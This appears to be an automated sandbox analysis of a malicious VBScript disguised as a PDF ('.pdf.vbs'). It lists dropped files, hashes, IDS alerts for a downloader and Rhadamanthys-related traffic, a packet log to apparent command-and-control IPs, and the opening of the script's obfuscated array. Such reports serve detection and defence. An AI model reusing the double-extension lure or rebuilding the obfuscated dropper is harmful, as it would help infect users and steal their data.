                                                                                                                                              MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                              SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                              SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                              SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):34415
                                                                                                                                              Entropy (8bit):7.352974342178997
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                              MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                              SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                              SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                              SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3465076
                                                                                                                                              Entropy (8bit):7.898517227646252
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                              MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                              SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                              SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                              SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GFVT0AWOBV681WR9RMKT.temp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12
                                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:/l:
                                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:............

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MR9SCIRVTLMM51DQ0SFM.temp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12
                                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:/l:
                                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:............

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12
                                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:/l:
                                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:............

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF34557.TMP (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12
                                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:/l:
                                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:............

                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):55
                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:ASCII text, with very long lines (2406), with CRLF line terminators
                                                                                                                                              Entropy (8bit):3.683174889172532
                                                                                                                                              TrID:
                                                                                                                                                File name:List of required items and services.pdf.vbs
                                                                                                                                                File size:2'652 bytes
                                                                                                                                                MD5:ff72b1e0f5d3b97e35607d56fbad4822
                                                                                                                                                SHA1:df3978221f7bc99d030b6fe4740fba6b82b9298d
                                                                                                                                                SHA256:514de6a57036885af76574b16a93669699edd143fea8532a24491c7bfe004ffc
                                                                                                                                                SHA512:2eecf4c4b6bb17a5e8aaa570b47814abfe11f67cd64b0b7ce28af3622fedd6be9bf9b1150f1be6f0a21ec75c4dab05feca3fecd4198797f12fb81d18e2ed21b5
                                                                                                                                                SSDEEP:48:qKH01qOvNee1R106c90SRICev2E0SRlN50SRgf06Per0SR/9dRwW0D31XlT9swU9:/NOYMv1c90SqSE0Sp50SKf5s0SpPmWUO
                                                                                                                                                TLSH:2451280D21DFF0DB42A2182E7110D88B4FE3CB7D5627C6AAAF368B76E5018354DED51A
                                                                                                                                                File Content Preview:jnbma9rdmds46 = Array(385, 432, 419, 415, 434, 419, 397, 416, 424, 419, 417, 434, 358, 352, 405, 401, 417, 432, 423, 430, 434, 364, 401, 422, 419, 426, 426, 352, 359, 364, 400, 435, 428, 350, 352, 430, 429, 437, 419, 432, 433, 422, 419, 426, 426, 364, 419

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:68d69b8f86ab9a86

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-18T19:27:08.946685+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449809202.71.109.228443TCP
                                                                                                                                                2024-12-18T19:27:17.775005+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert187.120.127.2153847192.168.2.449840TCP
                                                                                                                                                2024-12-18T19:27:42.108937+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert187.120.127.2153847192.168.2.449901TCP
                                                                                                                                                2024-12-18T19:27:42.108937+01002854824ETPRO JA3 HASH Suspected Malware Related Response287.120.127.2153847192.168.2.449901TCP
                                                                                                                                                2024-12-18T19:27:53.874031+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert187.120.127.2153847192.168.2.449927TCP
                                                                                                                                                2024-12-18T19:27:53.874031+01002854824ETPRO JA3 HASH Suspected Malware Related Response287.120.127.2153847192.168.2.449927TCP
                                                                                                                                                2024-12-18T19:28:08.427647+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert187.120.127.2153847192.168.2.449958TCP
                                                                                                                                                2024-12-18T19:28:08.427647+01002854824ETPRO JA3 HASH Suspected Malware Related Response287.120.127.2153847192.168.2.449958TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 18, 2024 19:26:10.002057076 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:10.002083063 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:10.002149105 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:10.012614965 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:10.012626886 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.283822060 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.283948898 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.287739992 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.287750006 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.287978888 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.300035000 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.347335100 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.730344057 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.784791946 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.784810066 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.831665039 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.850074053 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850085020 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850158930 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850179911 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.850231886 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850265026 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.850279093 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850291014 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.850310087 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.850327015 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.950254917 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.950265884 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.950315952 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.950351954 CET44349730107.161.23.150192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:11.950362921 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.950433969 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:11.967415094 CET49730443192.168.2.4107.161.23.150
                                                                                                                                                Dec 18, 2024 19:26:20.545841932 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:20.545939922 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:20.546026945 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:20.548104048 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:20.548139095 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:22.232583046 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:22.232676983 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:22.237329960 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:22.237353086 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:22.237709045 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:22.243640900 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:22.287328959 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.056652069 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.056688070 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.056750059 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.056777954 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.097407103 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.275746107 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.275758982 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.275873899 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.295062065 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.295150042 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.325654030 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.325735092 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.346786022 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.346869946 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.509726048 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.509814978 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.526170015 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.526242018 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.544123888 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.544220924 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.561803102 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.561877966 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.585509062 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.585591078 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.603152037 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.603243113 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.621303082 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.621764898 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.646270037 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.646373034 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.751961946 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.752041101 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.761089087 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.761168957 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.775942087 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.776020050 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.787472010 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.787549019 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.799948931 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.800028086 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.816338062 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.816425085 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.828845024 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.828917980 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.841392994 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.841470003 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.907465935 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.907562017 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.921696901 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.921782970 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.931379080 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.931471109 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.943392038 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.943504095 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.951895952 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.951998949 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.960669041 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.960786104 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.971966028 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.972057104 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.978739977 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.978817940 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.987377882 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.987447977 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:23.995078087 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:23.995160103 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.005009890 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.005095959 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.012876987 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.012953997 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.020814896 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.020899057 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.029047012 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.029145956 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.039046049 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.039128065 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.046408892 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.046484947 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.054013968 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.054089069 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.061937094 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.062014103 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.067059994 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.067143917 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.075141907 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.075217009 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.080487967 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.080586910 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.086435080 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.086514950 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.092340946 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.092417955 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.134006977 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.134089947 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.138725996 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.138794899 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.174199104 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.174279928 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.177436113 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.177515030 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.180238008 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.180319071 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.241611004 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.241692066 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.243976116 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.244048119 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.475241899 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.475259066 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.475353003 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.478096008 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.478167057 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.480510950 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.480581999 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.483016968 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.483102083 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.706783056 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.706798077 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.706890106 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:24.709151983 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:24.709224939 CET49732443192.168.2.4202.71.109.228
                                                                                                                                                Dec 18, 2024 19:26:25.636544943 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:25.636636972 CET44349732202.71.109.228192.168.2.4
                                                                                                                                                Dec 18, 2024 19:26:25.636656046 CET49732443192.168.2.4202.71.109.228
